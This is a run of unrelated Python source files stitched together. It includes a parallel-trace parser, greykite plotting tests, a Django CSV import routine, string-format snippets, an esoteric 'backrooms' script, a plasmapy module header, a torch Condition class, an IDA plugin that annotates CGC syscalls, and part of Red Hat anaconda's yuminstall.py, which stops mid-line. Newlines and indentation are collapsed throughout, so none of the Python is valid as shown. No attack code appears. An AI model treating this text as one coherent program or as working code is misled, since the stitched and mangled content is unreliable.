update_parallelism_intervals_on_exit( entity, saved_call_stacks, current_call_stack_per_cpu, work_state_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu): updated_processed_time = previous_processed_times_per_cpu updated_parallelism = prior_parallelism if entity.entity_type == EntityType.STACKFRAME: # update the parallelism interval before we change the top of the stack updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( False, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: pass elif (entity.entity_type == EntityType.SYNC_REGION or entity.entity_type == EntityType.WORK): updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( False, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu].pop() if current_work_state == True: if work_state_stack_per_cpu[entity.cpu][-1] == True: pass # no change else: # going from work to non work logging.trace("%s:swap to not active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism -= 1 else: if work_state_stack_per_cpu[entity.cpu][-1] == True: # going from non-work to work logging.trace("%s:swap to active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism += 1 else: pass # no change elif entity.entity_type == EntityType.TASK_REGION: pass elif entity.entity_type == EntityType.TASK_PERIOD: # if we are leaving a task period, we are stopping updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( False, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu].pop() if current_work_state == True: if work_state_stack_per_cpu[entity.cpu][-1] == True: pass # no change else: # going from work to non work logging.trace("%s:swap to not active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism -= 1 else: # TODO should this happen?? how can I be leaving a task period yet be in non-work?? 
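# (One way this can occur: the entry handler above leaves TASK_PERIOD as a TODO and
# never pushes onto work_state_stack_per_cpu, so the value popped here was pushed by
# an enclosing WORK or SYNC_REGION entry, or is the per-CPU seed value, rather than
# by the task period itself.)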
if work_state_stack_per_cpu[entity.cpu][-1] == True: # going from non-work to work logging.trace("%s:swap to active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism += 1 else: pass # no change elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( False, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu].pop() if current_work_state == True: if work_state_stack_per_cpu[entity.cpu][-1] == True: pass # no change else: # going from work to non work logging.trace("%s:swap to not active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism -= 1 else: if work_state_stack_per_cpu[entity.cpu][-1] == True: # going from non-work to work logging.trace("%s:swap to active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism += 1 else: pass # no change elif entity.entity_type == EntityType.THREAD: pass elif entity.entity_type == EntityType.PARALLEL_REGION: pass elif entity.entity_type == EntityType.TASK_CREATION: pass else: logging.error("No parsing support for %s", entity.entity_type) raise NotImplementedError() return updated_parallelism, updated_processed_times_per_cpu """ This function reads the constructs from the trace file, and parses them to build a tree of related entities Each entitiy has intervals for its time-on-stack, time-on-top-of-stack, parallelism, and so on """ def process_events(filename): # parse all of the events into one list of entries/exits # sort the events by time # then iterate over each event, processing them according to their type entries, exits, unique_groups, max_cpu, main_cpu, min_timestamp, max_timestamp = parse_trace(filename) # Every task must have its own callstack that it works on # When it creates a task, it copies its callstack over to the new task # All call stacks should just hold references to the same entities # If I have created a task which I am not executing, then I do some other stuff # And another CPU picks up that task, that other CPU should execute the task as a child of the function that created it logging.debug("Processing the constructs found in the tracefile.") logging.trace("The main CPU was: %d", main_cpu) saved_call_stacks = {} saved_call_stacks["init"] = [] current_call_stack_per_cpu = {} work_state_stack_per_cpu = {} for i in range(max_cpu+1): if i == main_cpu: work_state_stack_per_cpu[i] = [True] current_call_stack_per_cpu[i] = ["init"] # only the main cpu has an initial call stack! 
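# (Initialization invariant: the main CPU starts out "working" with the shared
# "init" call stack, while every other CPU starts idle with no active call stack
# until a task period or work region assigns it one.)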
else: work_state_stack_per_cpu[i] = [False] current_call_stack_per_cpu[i] = [] current_parallelism = 1 current_processed_times_per_cpu = [-1 for _ in range(max_cpu+1)] total_parallelism_entry_time = 0.0 total_parallelism_exit_time = 0.0 total_process_entry_time = 0.0 total_process_exit_time = 0.0 max_depth = [0] unique_cpus = [] top_level_entities = [] entry_idx = 0 exit_idx = 0 while(True): next_entity_is_exit, next_entity, entry_idx, exit_idx = get_next_entity(entries, exits, entry_idx, exit_idx) if next_entity is None: break if next_entity_is_exit == False: if next_entity.cpu not in unique_cpus: unique_cpus.append(next_entity.cpu) logging.trace("%d:%d:ENTRY:%s:%s:%s:task_identifier was %s and parent identifier was %s", next_entity.start, next_entity.cpu, next_entity.group, next_entity.entity_type, next_entity, next_entity.identifier, next_entity.parent_id) if debug_mode(): t0 = time.time() current_parallelism, current_processed_time = update_parallelism_intervals_on_entry(next_entity, saved_call_stacks, current_call_stack_per_cpu, work_state_stack_per_cpu, current_parallelism, current_processed_times_per_cpu, main_cpu) if debug_mode(): t1 = time.time() total_parallelism_entry_time += (t1 - t0) process_entry(next_entity, saved_call_stacks, current_call_stack_per_cpu, top_level_entities, max_depth) if debug_mode(): t2 = time.time() total_process_entry_time += (t2 - t1) elif next_entity_is_exit == True: logging.trace("%d:%d:EXIT:%s:%s:%s:task_identifier was %s and parent identifier was %s", next_entity.start, next_entity.cpu, next_entity.group, next_entity.entity_type, next_entity, next_entity.identifier, next_entity.parent_id) if debug_mode(): t0 = time.time() current_parallelism, current_processed_time = update_parallelism_intervals_on_exit(next_entity, saved_call_stacks, current_call_stack_per_cpu, work_state_stack_per_cpu, current_parallelism, current_processed_times_per_cpu, main_cpu) if debug_mode(): t1 = time.time() total_parallelism_exit_time += (t1 - t0) process_exit(next_entity, saved_call_stacks, current_call_stack_per_cpu, top_level_entities, exits, exit_idx) if debug_mode(): t2 = time.time() total_process_exit_time += (t2 - t1) logging.debug("Finished processing the constructs found in the tracefile.") if debug_mode(): logging.debug("Timings:") logging.debug("Total parallelism entry processing time: %f", total_parallelism_entry_time) logging.debug("Total parallelism exit processing time: %f", total_parallelism_exit_time) logging.debug("Total entry processing time: %f", total_process_entry_time) logging.debug("Total exit processing time: %f", total_process_exit_time) return top_level_entities, unique_groups, max_depth[0], min_timestamp, max_timestamp, unique_cpus import datetime import math from functools import partial import matplotlib import numpy as np import pandas as pd import scipy.stats from greykite.common.viz.timeseries_plotting_mpl import plt_compare_timeseries from greykite.common.viz.timeseries_plotting_mpl import plt_longterm_ts_agg from greykite.common.viz.timeseries_plotting_mpl import plt_overlay_long_df from greykite.common.viz.timeseries_plotting_mpl import plt_overlay_with_bands matplotlib.use("agg") # noqa: E402 def test_plt_compare_timeseries(): date_list = pd.date_range( start=datetime.datetime(2018, 6, 1), periods=24 * 600, freq="H").tolist() df = pd.DataFrame({"ts": date_list}) df1 = df.copy() df2 = df.copy() value_col = "y" df1[value_col] = np.random.normal(size=df1.shape[0]) df2[value_col] = np.random.normal(size=df2.shape[0]) plt_compare_timeseries( 
df_dict={"obs": df1, "forecast": df2}, time_col="ts", value_col="y", start_time=datetime.datetime(2019, 9, 1), end_time=datetime.datetime(2019, 9, 10)) # custom legends plt_compare_timeseries( df_dict={"obs": df1, "forecast": df2}, time_col="ts", value_col="y", legends_dict={"obs": "observed", "forecast": "silverkite forecast"}, start_time=datetime.datetime(2019, 9, 1), end_time=datetime.datetime(2019, 9, 10)) # custom colors plt_compare_timeseries( df_dict={"obs": df1, "forecast": df2}, time_col="ts", value_col="y", colors_dict={"obs": "red", "forecast": "green"}, start_time=datetime.datetime(2019, 9, 1), end_time=datetime.datetime(2019, 9, 10)) def test_plt_overlay_long_df(): m = 200 x = np.array(list(range(m)) * m) / (1.0 * m) x = x * 2 * math.pi z = [] for u in range(m): z = z + [u] * m y = np.sin(x) + np.random.normal(0, 1, len(x)) w = np.cos(x) + np.random.normal(0, 1, len(x)) df = pd.DataFrame({"x": x, "y": y, "z": z, "w": w}) agg_dict = { "y": [np.nanmean, partial(np.nanpercentile, q=25), partial(np.nanpercentile, q=75)], "w": np.nanmean } agg_col_names = ["mean", "lower", "upper", "w"] x_col = "x" y_col = "y" split_col = "z" df_plt = plt_overlay_long_df( df=df, x_col=x_col, y_col=y_col, split_col=split_col, plt_title="", agg_dict=agg_dict, agg_col_names=agg_col_names) assert list(df_plt.columns) == ["x"] + agg_col_names def test_plt_overlay_with_bands(): m = 200 x = np.array(list(range(m)) * m) / (1.0 * m) x = x * 2 * math.pi z = [] for u in range(m): z = z + [u] * m y = np.sin(x) + np.random.normal(0, 1, len(x)) df = pd.DataFrame({"x": x, "y": y, "z": z}) x_col = "x" y_col = "y" split_col = "z" plt_overlay_with_bands( df=df, x_col=x_col, y_col=y_col, split_col=split_col, perc=[25, 75], overlay_color="black", agg_col_colors=None, plt_title=None) def test_plt_longterm_ts_agg_fixed_color(): """Testing `plt_longterm_ts_agg` with fixed color across""" r = 10.0 x = np.linspace(2.0, 2.0 + r, num=100) y = np.linspace(3.0, 3.0 + r, num=100) ** 2 + np.random.normal(0, 20, 100) df = pd.DataFrame({"x": x, "y": y}) df["window"] = df["x"].map(round) plt_longterm_ts_agg( df=df, time_col="x", window_col="window", value_col="y", agg_func=np.nanmean, plt_title="fixed color", color="blue") def test_plt_longterm_ts_agg_changing_color(): """Testing `plt_longterm_ts_agg` with changing color across the curve""" r = 10.0 x = np.linspace(2.0, 2.0 + r, num=100) y = np.linspace(3.0, 3.0 + r, num=100) ** 2 + np.random.normal(0, 20, 100) z = ["red"]*20 + ["green"]*20 + ["blue"]*60 df = pd.DataFrame({"x": x, "y": y, "z": z}) df["window"] = df["x"].map(round) plt_longterm_ts_agg( df=df, time_col="x", window_col="window", value_col="y", color_col="z", agg_func=np.nanmean, plt_title="changing_color", color=None) def test_plt_longterm_ts_agg_custom_choose_color(): """Testing `plt_longterm_ts_agg` with custom choice of color""" r = 10.0 x = np.linspace(2.0, 2.0 + r, num=100) y = np.linspace(3.0, 3.0 + r, num=100) ** 2 + np.random.normal(0, 20, 100) z = ["red"]*20 + ["green"]*20 + ["blue"]*60 df = pd.DataFrame({"x": x, "y": y, "z": z}) df["window"] = df["x"].map(round) # we define a custom `choose_color_func` # this function returns the most common color seen for the give slice def choose_color_func(x): return scipy.stats.mode(x)[0][0] plt_longterm_ts_agg( df=df, time_col="x", window_col="window", value_col="y", color_col="z", agg_func=np.nanmean, plt_title="changing_color", color=None, choose_color_func=choose_color_func) import os from django.apps import apps from django.conf import settings from 
pipeline.constants import SOURCE_DATABC, SOURCE_OPENCA from pipeline.models.general import DataSource from pipeline.importers.communities import import_communities_from_csv from pipeline.importers.projects import import_projects from pipeline.importers.utils import (import_data_into_point_model, read_csv, import_civic_leaders_from_csv, get_databc_last_modified_date, import_services, get_openca_last_modified_date, import_bc_assessment_data) FILES_DIR = settings.BASE_DIR def import_csv_resources(resource_type): csv_resource_names = DataSource.objects.filter(source_type="csv").values_list("name", flat=True) if resource_type not in ['all', *csv_resource_names]: print("Error: Resource type {} not supported".format(resource_type)) return if resource_type == "all": for available_resource_type in csv_resource_names: import_resource(available_resource_type) else: import_resource(resource_type) def import_resource(resource_type): data_source = DataSource.objects.get(name=resource_type) file_path = os.path.join(FILES_DIR, data_source.source_file_path) # TODO SY - move this into constants? location_csv_resources = [ 'first_responders', 'diagnostic_facilities', 'timber_facilities', 'civic_facilities', 'closed_mills', 'airports', 'port_and_terminal', 'eao_projects', 'laboratory_service', 'local_govt_offices', 'emergency_social_service_facilities', 'natural_resource_projects', 'customs_ports_of_entry', 'pharmacies', 'public_library', 'first_nations_health_authority' ] bca_resources = [ 'bc_assessment_census_subdivision', 'bc_assessment_economic_region', 'bc_assessment_regional_district' ] if resource_type == "communities": import_communities_from_csv(file_path) elif resource_type == "civic_leaders": import_civic_leaders_from_csv(file_path) elif resource_type == "services": import_services(file_path) elif resource_type == "projects": import_projects(file_path) elif resource_type in bca_resources: model_class = apps.get_model("pipeline", data_source.model_name) import_bc_assessment_data(file_path, model_class, resource_type) elif resource_type in location_csv_resources: data = read_csv(data_source.source_file_path) for row in data: model_class = apps.get_model("pipeline", data_source.model_name) import_data_into_point_model(resource_type, model_class, row) else: print("Error: Resource type {} not supported".format(resource_type)) if data_source.source == SOURCE_DATABC: data_source.last_updated = get_databc_last_modified_date(data_source) data_source.save() elif data_source.source == SOURCE_OPENCA: data_source.last_updated = get_openca_last_modified_date(data_source) data_source.save() my_str = "{} is {} years old".format("Peter", 50) # Peter is 50 years old my_str = "{0} is {1} years old. {1} years old!".format("Peter", 50) # Peter is 50 years old. 50 years old! data = {'name': 'Peter', 'age': 50} my_str = "{name} is {age} years old.".format(**data) # Peter is 50 years old. my_str = "{p[name]} is {p[age]} years old.".format(p=data) # Peter is 50 years old. <filename>backrooms/backrooms_builtins/brs_hard_vector.py """ Copyright 2021 <NAME> """ # backrooms from backrooms.translator import StringHandler NAME = "h_vector" SCRIPT = """ %utils # WS[...] -> WS[size, ...] ~SIZE />rs"_SIZE"hcphr ~_SIZE />ri0ri9hr # WS[item, ...] -> WS[...] ~APPEND />rs"SIZE"hck0dfrs"_START"hg-zisk1fzrs"utils"rs"NEW"hlfs1rs"utils"rs"KEEP"hls0+frs"_SIZE"rs"utils"rs"KEEP"hlhr # WS[...] -> WS[item, ...] ~POP />rs"SIZE"hcZV-k0rs"READ"hcfs0bcrs"utils"rs"REMOVE"hls0frs"_SIZE"rs"utils"rs"KEEP"hlhr / >prnhr # WS[...] -> WS[item, ...] 
~PEAK />rs"SIZE"hcZV-rs"READ"hchr / >prnhr # WS[spot, ...] -> WS[item, ...] ~READ />bcfzrs"utils"rs"STORE"hlhr # WS[spot, item, ...] -> WS[...] ~WRITE />bcfzrs"utils"rs"KEEP"hlhr # WS[spot, ...] -> WS[...] ~REMOVE /V >ppprs"POP"hcphr />ic+rs"SIZE"hcz>uoisZ^pddrs"READ"V / ^+ch"ETIRW"sr-zch.< # WS[spot, item, ...] -> WS[...] ~INSERT /V >pprs"WRITE"hchr />icd-k0prs"SIZE"hc-rnrs"APPEND"hc>ds0isZ^pddrs"READ"V / ^-ch"ETIRW"sr+zch..< # WS[item, ...] -> WS[...] ~FIND_INSERT /V V..............................p2kp< />k0pri0k1prs"SIZE"hck2ZVps0ri0rs"READ"hcis.GVZV>ps0s2-rs"READ"hcisLVZVp>s2s1isri2ids1iadrs"READ"hcs0isGVZV^ / rhch"DNEPPA"sr0sp<rhch"TRESNI"sr0ir0sp<.< rhch"DNEPPA"sr0sp<.< ^....p1kppVZVLsi0sch"DAER"srd+dp<.< / >.>ps0zrs"INSERT"hcphr ~_START / """ def get_handler() -> StringHandler: """ info: Gets script handler. :return: StringHandler """ return StringHandler(NAME, SCRIPT) <filename>plasmapy/dispersion/__init__.py """ The `~plasmapy.dispersion` subpackage contains functionality associated with plasma dispersion relations, including numerical solvers and `~plasmapy.dispersion.analytical` solutions. """ __all__ = [ "plasma_dispersion_func", "plasma_dispersion_func_deriv", ] # TODO: import plasmapy.dispersion.numerical once it is populated with # functionality (i.e. expose to namespace) from plasmapy.dispersion import analytical from plasmapy.dispersion.dispersionfunction import ( plasma_dispersion_func, plasma_dispersion_func_deriv, ) """ """ import torch from .location import Location class Condition: def __init__(self, *args, **kwargs): if len(args) == 2 and not kwargs: if (isinstance(args[0], torch.Tensor) and isinstance(args[1], torch.Tensor)): self.input_points = args[0] self.output_points = args[1] elif isinstance(args[0], Location) and callable(args[1]): self.location = args[0] self.function = args[1] elif isinstance(args[0], Location) and isinstance(args[1], list): self.location = args[0] self.function = args[1] else: raise ValueError elif not args and len(kwargs) == 2: if 'input_points' in kwargs and 'output_points' in kwargs: self.input_points = kwargs['input_points'] self.output_points = kwargs['output_points'] elif 'location' in kwargs and 'function' in kwargs: self.location = kwargs['location'] self.function = kwargs['function'] else: raise ValueError else: raise ValueError <reponame>0xddaa/iddaa import idaapi import iddaa.utils as utils import idc import re debug = False version = (1, 0, 0) syscall_table = { 1: '_terminate', 2: 'transmit', 3: 'receive', 4: 'fdwait', 5: 'allocate', 6: 'deallocate', 7: 'random' } class CGCHelper(idaapi.plugin_t): flags = idaapi.PLUGIN_UNL comment = 'CGC Helper' help = 'Press Shift-R to revise syscall to CGC defined.' 
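# revise_syscall() below walks the .text segment, remembering the immediate from the
# most recent `mov eax, <imm>` (only values 1..7 are kept), and on each `int 80h`
# annotates the call site with the matching syscall_table entry; with rename=True it
# also renames the enclosing function to that syscall name.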
wanted_name = 'CGC Helper' wanted_hotkey = '' def init(self): print('CGC Helper ({}) plugin has been loaded.'.format(utils.dump_version(version))) hotkey_ctx = idaapi.add_hotkey('Shift-R', CGCHelper.revise_syscall) if hotkey_ctx: print(self.help) return idaapi.PLUGIN_KEEP else: print('Failed to register CGCHelper hotkey!') del hotkey_ctx return idaapi.PLUGIN_SKIP def run(self, arg): pass def term(self): pass @staticmethod def revise_syscall(rename=False): if not rename: print('Change the function name with `CGCHeler.revise_syscall(True)`.') # visit all instructions start_ea, end_ea = utils.get_seg_range('.text') eax = -1 ip = start_ea while ip < end_ea and ip != idaapi.BADADDR: if 'int' in idc.GetMnem(ip) and '80h' == idc.GetOpnd(ip, 0): if eax != -1: # fix comment and function name print('{}: {}'.format(hex(ip), syscall_table[eax])) idc.MakeComm(ip, 'CGC syscall: {}'.format(syscall_table[eax])) if rename: print('Change {} to {}'.format(idc.GetFunctionName(ip), syscall_table[eax])) idc.MakeName(idc.GetFunctionAttr(ip, idc.FUNCATTR_START), syscall_table[eax]) elif 'mov' in idc.GetMnem(ip) and 'eax' == idc.GetOpnd(ip, 0) and 5 == idc.GetOpType(ip, 1): value = idc.GetOpnd(ip, 1) if re.search('^[0-9]+$', value) != None: eax = int(value) if eax > 7 or eax < 1: eax = -1 ip = idc.NextHead(ip) def PLUGIN_ENTRY(): return CGCHelper() <gh_stars>0 # # yuminstall.py # # Copyright (C) 2005, 2006, 2007 Red Hat, Inc. All rights reserved. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. 
# from flags import flags from errors import * from ConfigParser import ConfigParser import sys import os import os.path import shutil import time import warnings import types import locale import glob import tempfile import itertools import re import anaconda_log import rpm import rpmUtils import urlgrabber.progress import urlgrabber.grabber from urlgrabber.grabber import URLGrabber, URLGrabError import yum import iniparse from yum.constants import * from yum.Errors import * from yum.misc import to_unicode from yum.yumRepo import YumRepository from backend import AnacondaBackend from product import * from sortedtransaction import SplitMediaTransactionData from constants import * from image import * from compssort import * import packages import iutil import gettext _ = lambda x: gettext.ldgettext("anaconda", x) P_ = lambda x, y, z: gettext.ldngettext("anaconda", x, y, z) import network # specspo stuff rpm.addMacro("_i18ndomains", "redhat-dist") import logging log = logging.getLogger("anaconda") import urlparse urlparse.uses_fragment.append('media') urlgrabber.grabber.default_grabber.opts.user_agent = "%s (anaconda)/%s" %(productName, productVersion) import iutil import isys def size_string (size): def number_format(s): return locale.format("%s", s, 1) retval = None if size > 1024 * 1024: size = size / (1024*1024) retval = _("%s MB") %(number_format(size),) elif size > 1024: size = size / 1024 retval = _("%s KB") %(number_format(size),) else: retval = P_("%s Byte", "%s Bytes", size) % (number_format(size),) return to_unicode(retval) class AnacondaCallback: def __init__(self, ayum, anaconda, instLog, modeText): self.repos = ayum.repos self.ts = ayum.ts self.ayum = ayum self.messageWindow = anaconda.intf.messageWindow self.pulseWindow = anaconda.intf.progressWindow self.progress = anaconda.id.instProgress self.progressWindowClass = anaconda.intf.progressWindow self.rootPath = anaconda.rootPath self.initWindow = None self.progressWindow = None self.lastprogress = 0 self.incr = 20 self.instLog = instLog self.modeText = modeText self.openfile = None self.inProgressPo = None def setSizes(self, numpkgs, totalSize, totalFiles): self.numpkgs = numpkgs self.totalSize = totalSize self.totalFiles = totalFiles self.donepkgs = 0 self.doneSize = 0 self.doneFiles = 0 def callback(self, what, amount, total, h, user): if what == rpm.RPMCALLBACK_TRANS_START: # step 6 is the bulk of the ts processing time if amount == 6: self.progressWindow = \ self.progressWindowClass (_("Preparing to install"), _("Preparing transaction from installation source"), total) self.incr = total / 10 if what == rpm.RPMCALLBACK_TRANS_PROGRESS: if self.progressWindow and amount > self.lastprogress + self.incr: self.progressWindow.set(amount) self.lastprogress = amount if what == rpm.RPMCALLBACK_TRANS_STOP and self.progressWindow: self.progressWindow.pop() if what == rpm.RPMCALLBACK_INST_OPEN_FILE: (hdr, rpmloc) = h # hate hate hate at epochs... 
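# The epoch from the RPM header may be None (no epoch); when present it is an
# integer and is stringified below before the tsInfo.matchNaevr() lookup.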
epoch = hdr['epoch'] if epoch is not None: epoch = str(epoch) txmbrs = self.ayum.tsInfo.matchNaevr(hdr['name'], hdr['arch'], epoch, hdr['version'], hdr['release']) if len(txmbrs) == 0: raise RuntimeError, "Unable to find package %s-%s-%s.%s" %(hdr['name'], hdr['version'], hdr['release'], hdr['arch']) po = txmbrs[0].po repo = self.repos.getRepo(po.repoid) pkgStr = "%s-%s-%s.%s" % (po.name, po.version, po.release, po.arch) s = to_unicode(_("<b>Installing %(pkgStr)s</b> (%(size)s)\n")) \ % {'pkgStr': pkgStr, 'size': size_string(hdr['size'])} summary = to_unicode(gettext.ldgettext("redhat-dist", hdr['summary'] or "")) s += summary.strip() self.progress.set_label(s) self.instLog.write(self.modeText % str(pkgStr)) self.instLog.flush() self.openfile = None # STACKI retries = 0 while self.openfile is None: try: fn = repo.getPackage(po) f = open(fn, 'r') self.openfile = f except (yum.Errors.NoMoreMirrorsRepoError, IOError): log.info("STACKI:getPackage:failed:retries (%d)" % retries) if retries > 10: self.ayum._handleFailure(po) else: retries += 1 continue except yum.Errors.RepoError, e: continue # STACKI trynumber = 0 while self.openfile is None: trynumber += 1 try: # checkfunc gets passed to yum's use of URLGrabber which # then calls it with the file being fetched. verifyPkg # makes sure the checksum matches the one in the metadata. # # From the URLGrab documents: # checkfunc=(function, ('arg1', 2), {'kwarg': 3}) # results in a callback like: # function(obj, 'arg1', 2, kwarg=3) # obj.filename = '/tmp/stuff' # obj.url = 'http://foo.com/stuff' checkfunc = (self.ayum.verifyPkg, (po, 1), {}) fn = repo.getPackage(po, checkfunc=checkfunc) f = open(fn, 'r') self.openfile = f except yum.Errors.NoMoreMirrorsRepoError: self.ayum._handleFailure(po, trynumber) except IOError: self.ayum._handleFailure(po, trynumber) except URLGrabError as e: log.error("URLGrabError: %s" % (e,)) self.ayum._handleFailure(po, trynumber) except yum.Errors.RepoError, e: continue self.inProgressPo = po return self.openfile.fileno() elif what == rpm.RPMCALLBACK_INST_CLOSE_FILE: if self.initWindow: self.initWindow.pop() self.initWindow = None (hdr, rpmloc) = h fn = self.openfile.name self.openfile.close() self.openfile = None if os.path.dirname(fn).startswith("%s/var/cache/yum/" % self.rootPath): try: os.unlink(fn) except OSError as e: log.debug("unable to remove file %s" %(e.strerror,)) self.donepkgs += 1 self.doneSize += self.inProgressPo.returnSimple("installedsize") / 1024.0 self.doneFiles += len(hdr[rpm.RPMTAG_BASENAMES]) if self.donepkgs <= self.numpkgs: self.progress.set_text(P_("Packages completed: " "%(donepkgs)d of %(numpkgs)d", "Packages completed: " "%(donepkgs)d of %(numpkgs)d", self.numpkgs) % {'donepkgs': self.donepkgs, 'numpkgs': self.numpkgs}) if self.totalSize > 0: self.progress.set_fraction(float(self.doneSize / self.totalSize)) else: self.progress.set_fraction(0.0) self.progress.processEvents() self.inProgressPo = None elif what in (rpm.RPMCALLBACK_UNINST_START, rpm.RPMCALLBACK_UNINST_STOP): if self.initWindow is None: self.initWindow = self.pulseWindow(_("Finishing upgrade"), _("Finishing upgrade process. This may take a little while."), 0, pulse=True) else: self.initWindow.pulse() elif what in (rpm.RPMCALLBACK_CPIO_ERROR, rpm.RPMCALLBACK_UNPACK_ERROR, rpm.RPMCALLBACK_SCRIPT_ERROR): if not isinstance(h, types.TupleType): h = (h, None) (hdr, rpmloc) = h # Script errors store whether or not they're fatal in "total". So, # we should only error out for fatal script errors or the cpio and # unpack problems. 
if what != rpm.RPMCALLBACK_SCRIPT_ERROR or total: self.messageWindow(_("Error Installing Package"), _("A fatal error occurred when installing the %s " "package. This could indicate errors when reading " "the installation media. Installation cannot " "continue.") % hdr, type="custom", custom_icon="error", custom_buttons=[_("_Exit installer")]) sys.exit(1) if self.initWindow is None: self.progress.processEvents() class AnacondaYumRepo(YumRepository): def __init__(self, *args, **kwargs): YumRepository.__init__(self, *args, **kwargs) self.enablegroups = True self.sslverify = True self._anacondaBaseURLs = [] self.proxy_url = None def needsNetwork(self): def _isURL(s): return s.startswith("http") or s.startswith("ftp") # STACKI file = open('/proc/cmdline', 'r') args = string.split(file.readline()) file.close() if 'build' in args: return False # STACKI if len(self.baseurl) > 0: return len(filter(lambda s: _isURL(s), self.baseurl)) > 0 elif self.mirrorlist: return _isURL(self.mirrorlist) else: return False def dirCleanup(self, upgrade=False): cachedir = self.getAttribute('cachedir') if os.path.isdir(cachedir): if upgrade: log.debug("Removing contents of %s" % (cachedir)) for f in filter(os.path.isfile, glob.glob("%s/*" % (cachedir))): try: os.unlink(f) except Exception, e: log.debug("error %s removing: %s" %(e,f)) elif not self.needsNetwork() or self.name == "Installation Repo" or self.id.startswith("anaconda-"): log.debug("Removing cachedir: %s" % (cachedir)) shutil.rmtree(cachedir) else: log.debug("Removing headers and packages from %s" % (cachedir)) if os.path.exists("%s/headers" % cachedir): shutil.rmtree("%s/headers" % cachedir) if os.path.exists("%s/packages" % cachedir): shutil.rmtree("%s/packages" % cachedir) # needed to store nfs: repo url that yum doesn't know def _getAnacondaBaseURLs(self): return self._anacondaBaseURLs or self.baseurl or [self.mirrorlist] def _setAnacondaBaseURLs(self, value): self._anacondaBaseURLs = value anacondaBaseURLs = property(_getAnacondaBaseURLs, _setAnacondaBaseURLs, doc="Extends AnacondaYum.baseurl to store non-yum urls:") class YumSorter(yum.YumBase): def _transactionDataFactory(self): return SplitMediaTransactionData() class AnacondaYum(YumSorter): def __init__(self, anaconda): YumSorter.__init__(self) self.anaconda = anaconda self._timestamp = None self.repoIDcounter = itertools.count() # Only needed for hard drive and nfsiso installs. self._discImages = {} self.isodir = None # Only needed for media installs. self.currentMedia = None self.mediagrabber = None self._loopdev_used = None # Where is the source media mounted? This is the directory # where Packages/ is located. self.tree = "/mnt/source" self.macros = {} if flags.selinux: for directory in ("/tmp/updates", "/etc/selinux/targeted/contexts/files", "/etc/security/selinux/src/policy/file_contexts", "/etc/security/selinux"): fn = "%s/file_contexts" %(directory,) if os.access(fn, os.R_OK): break self.macros["__file_context_path"] = fn else: self.macros["__file_context_path"] = "%{nil}" self.updates = [] self.localPackages = [] # Parse proxy values from anaconda self.proxy = None self.proxy_url = None self.proxy_username = None self.proxy_password = None if self.anaconda.proxy: self.setProxy(self.anaconda, self) def setup(self): # yum doesn't understand all our method URLs, so use this for all # except FTP and HTTP installs. 
self._baseRepoURL = "file://%s" % self.tree while True: try: self.configBaseURL() break except SystemError as exception: self.anaconda.methodstr = self.anaconda.intf.methodstrRepoWindow(self.anaconda.methodstr or "cdrom:", exception) self.doConfigSetup(root=self.anaconda.rootPath) if not self.anaconda.id.getUpgrade(): self.conf.installonlypkgs = [] def _switchCD(self, discnum): if os.access("%s/.discinfo" % self.tree, os.R_OK): f = open("%s/.discinfo" % self.tree) self._timestamp = f.readline().strip() f.close() dev = self.anaconda.id.storage.devicetree.getDeviceByName(self.anaconda.mediaDevice) dev.format.mountpoint = self.tree # If self.currentMedia is None, then there shouldn't be anything # mounted. Before going further, see if the correct disc is already # in the drive. This saves a useless eject and insert if the user # has for some reason already put the disc in the drive. if self.currentMedia is None: try: dev.format.mount() if verifyMedia(self.tree, discnum, None): self.currentMedia = discnum return dev.format.unmount() except: pass else: unmountCD(dev, self.anaconda.intf.messageWindow) self.currentMedia = None dev.eject() while True: if self.anaconda.intf: self.anaconda.intf.beep() self.anaconda.intf.messageWindow(_("Change Disc"), _("Please insert %(productName)s disc %(discnum)d to continue.") % {'productName': productName, 'discnum': discnum}) try: dev.format.mount() if verifyMedia(self.tree, discnum, self._timestamp): self.currentMedia = discnum break self.anaconda.intf.messageWindow(_("Wrong Disc"), _("That's not the correct %s disc.") % (productName,)) dev.format.unmount() dev.eject() except: self.anaconda.intf.messageWindow(_("Error"), _("Unable to access the disc.")) def _switchImage(self, discnum): umountImage(self.tree, self.currentMedia, self._loopdev_used) self.currentMedia = None # mountDirectory checks before doing anything, so it's safe to # call this repeatedly. mountDirectory(self.anaconda.methodstr, self.anaconda.intf.messageWindow) (self._loopdev_used, self._discImages) = mountImage(self.isodir, self.tree, discnum, self.anaconda.intf.messageWindow, discImages=self._discImages) self.currentMedia = discnum def configBaseURL(self): # We only have a methodstr if method= or repo= was passed to # anaconda. No source for this base repo (the CD media, NFS, # whatever) is mounted yet since loader only mounts the source # for the stage2 image. We need to set up the source mount # now. if flags.cmdline.has_key("preupgrade"): path = "/var/cache/yum/preupgrade" self.anaconda.methodstr = "hd::%s" % path self._baseRepoURL = 